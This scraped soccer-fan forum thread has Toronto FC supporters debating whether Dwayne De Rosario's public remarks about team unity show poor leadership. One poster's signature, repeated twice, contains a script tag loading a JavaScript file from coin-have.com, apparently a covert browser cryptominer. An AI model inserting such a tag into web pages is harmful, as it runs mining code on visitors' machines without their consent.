Page 1 of 9 12345 ... LastLast
    RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Default Hey DeRo: Shut up and play

We are coming up on the eve of our second match of the season. We have seen unusual events happen with our team, both with the retirement of Jim Brennan and the swirling rumours of discord in the dressing room.

No more excuses from the players about what is happening behind the scenes. You have a job to do. Get out on that pitch and do it!

DeRosario, we need you to lead, to set the example, to bring the team together! Not criticize in public and make negative comments. You complain about building team unity to the press?

Statements like this do nothing to promote confidence amongst the supporters or other players:
    “It's extremely difficult — it's almost like a first-year team again, starting from scratch,” he said. “It's very tough to build team unity.”
    If there's a new guy on the team, why are you not welcoming him and bringing him into the fold? Where is the leadership from a proven veteran, hometown guy and a winner?

Listen, we love and support our team through good times and bad, but internal divisions and crap have got to stop. It is time to put up or shut up on the field.

Put the work in and take that team by the scruff of the neck and make it yours. Bring them together and lead in the dressing room, not in the newspapers. You're here to play for us. We pay your salary.

Shut up and play.
    Toronto FC baby...best team everrrrrrrrrr -Jozy

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

He does whine alot...
    Amen to the above!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

yup. and involve those teammates in the play rather than being a ball hog like last year. i love De Ro but i wouldn't call him a team player on the field. last year he didn't seem to trust his teammates. he puts his head down and tries to do everything himself.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Scarborough Stand Up.

MUFC_Niagara

It goes without saying that team unity would be difficult to build at this point because guys are getting to know each other. I have always been surprised at how much the players on this team are willing to say to the fans and media.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

oh, and do something about that offside problem... thanks!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

All For One.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

He's stating what we blog about all day and night. If he said all is wonderful, and we're going to win MLS cup, and NCC, then CCL. We'd be on him for being positive without substance. I like DeRo's candor.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I disagree with every post in this thread. Yes Dero talks alot, and he has alot of passion. But that passion shows when he's on the field as well. It's not like he plays like he's lazy and talks shit after game. You can literally see him busting his balls on the field.

Dero - Keep talking but keep playing!

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by Pachuco View Post
    I disagree with every post in this thread. Yes Dero talks alot, and he has alot of passion. But that passion shows when he's on the field as well. It's not like he plays like he's lazy and talks shit after game. You can literally see him busting his balls on the field.

La ropa sucia se lava en casa.

Don't air your dirty laundry.

Shut up, keep it in the dressing room and work the shit out. I never questioned his on-field effort, but the fact is, we need him to be a leader on and off the field.

RPB Member
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Ladies Love Julius James View Post
    Scarborough Stand Up.

Friggin' right, bro! Scarborough rules!!

Oh, and we need DeRo to become this team's leader, heart, and soul.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Hey Jack: Shut Up and Support the Team

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by TorCanSoc View Post
    He's stating what we blog about all day and night. If he said all is wonderful, and we're going to win MLS cup, and NCC, then CCL. We'd be on him for being positive without substance. I like DeRo's candor.
    It would be better if he didn't say anything about that stuff. Candour is fine, but when it becomes divisive, it doesn't help.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

and these antics can create tension in the locker room he complains about not being united...seems a bit odd.

Yes, the players may be getting screwed, but at the end of the day they have a hard ass coach. the players are used to an easy friendly coach.

For once they have someone who isnt afraid making changes. Time will tell if these changes are right but until then....be professionals and get the job done.

Accountability of this teams performance goes from top to bottom and NO ONE will be excused.
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by timmay View Post
    Hey Timmay....who are you?

If I can't be vocal in my support for the team, then we're screwed.

MUFC_Niagara

Hey timmay: Shut up and support Cartman.

btw, there's only ONE timmay on this board....right Shaughno?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Jack View Post
    La ropa sucia se lava en casa.

Don't air your dirty laundry.

Shut up, keep it in the dressing room and work the shit out. I never questioned his on-field effort, but the fact is, we need him to be a leader on and off the field.
    I don't disagree with you there. But the example you showed above to me isn't airing dirty laundry. If he got up there and said, "this team is looking great, there is lots of unity, we are well prepared for the season, we have all the right players we need to make the playoffs" then I think we would call him dillusional right?

I'd just rather have a guy who wears his heart on his sleeves but at the same time can channel that emotion in a good way on the field then have someone who doesn't know how to express himself both on and off the field.

EDIT: BTW - If I ever start to feel Dero isn't giving it his all because of the off the field problems with the team then believe me, he'll be my new Vince Carter quickly
    Last edited by Pachuco; 04-08-2010 at 10:44 AM.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i'm telling you, he's one of the cancers in the room

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

blind support is done.....
    but we still have to wait and see how this goes....
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Jack our former RPB Prez has spoken...

Here! Here!
    @FluSH_RPB / IG: @Flush.rpb
    The Legendary
    RED PATCH BOYS

Registered
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)

Either way, he's our next captain.

It's his ship now.

At practice Wednesday morning, original signing Jim Brennan was nowhere in sight, readying lines for his retirement speech later in the day. His replacement at left back in the kickabout, a skinny blonde kid wearing a No. 28 jersey, has evidently yet to be introduced, or even signed to a contract.
    “I think his name is Thomas,” Dwayne De Rosario suggested, then shrugged his shoulders.
    I've seen a lot of captains in my day, even had to name a few - and before you ask it was for international competitions, not some pickup game - and like Jack said, a captain doesn't talk that way.

Just because you might be the team's best player, it doesn't mean you are a leader.

Is DeRo a good player? Yes.

Is he captain material? Well... we have no choice.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

we liked it when he talked about grass and other problems. can't edit our boy from Scarborough. I'd be frustrated too.
    as for being a ball hog etc. we need somebody to try to score. remember Montreal anyone?

Red Patch MVP! DERO for a reason.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Scarborough sucks! Grew up there...hated it and would never move back there.

Quote Originally Posted by Suds View Post
    Friggin' right, bro! Scarborough rules!!

Oh, and we need DeRo to become this team's leader, heart, and soul.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Nah, I gotta agree with Jack.

DeRo's a good MLS player, maybe even a great one. But he's not as good as he thinks (he was "embarassed" by the Real Madrid result, by way of example) he is. PLus he's publicly negative.

Sometimes, that's necessary. Times like this, not sure it helps. If he has something about management that needs to be said, sure. But this has been said to death and is just divisive.

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

I don't disagree with you there. But the example you showed above to me isn't airing dirty laundry. If he got up there and said, "this team is looking great, there is lots of unity, we are well prepared for the season, we have all the right players we need to make the playoffs" then I think we would call him dillusional right?

I'd just rather have a guy who wears his heart on his sleeves but at the same time can channel that emotion in a good way on the field then have someone who doesn't know how to express himself both on and off the field.
    I see your point. But in some cases it's better to give a canned answer like: "we're working hard to bring in the players needed to make this work" or "whatever changes happen, we have to go out there and perform with the teammates we've got".

I understand his frustration as it is shared by many, but he is a team leader and needs to think of more than his personal frustrations and feelings on matters.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I agree completely. I didn't think that particuliar quote from DeRo was that bad.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This would make a great chant.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

This thread is more about taking ownership... yeah he's working his ass off on the pitch, but at the same time you can argue if he's doing it for his best interest or the teams interest... many plays come to mind where I thought he was a bit selfish... (remember that Guevara steal) anyhow that's all in the past... we need Dero and we need him now.
    @FluSH_RPB / IG: @Flush.rpb
    The Legendary
    RED PATCH BOYS

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

And just to clarify, I hold DeRo in pretty high esteem as a player. I love his passion and his will to win. I also am demanding more of him as our best player and a leader of this team. He needs to think of the big picture a little more and that's what this thread is about.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think everyone here respects DeRo's ability to make it happen on the field, because you'd have to be blind to not see his skill, but what we need now, more than ever, if a real leader to move us forward. The position is his for the taking, so it's time to take the high road and push things forward. No off handed comments, no canadian passive-aggressiveness, just pure leadership. We all know DeRo has it in him to lead - get at it!
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\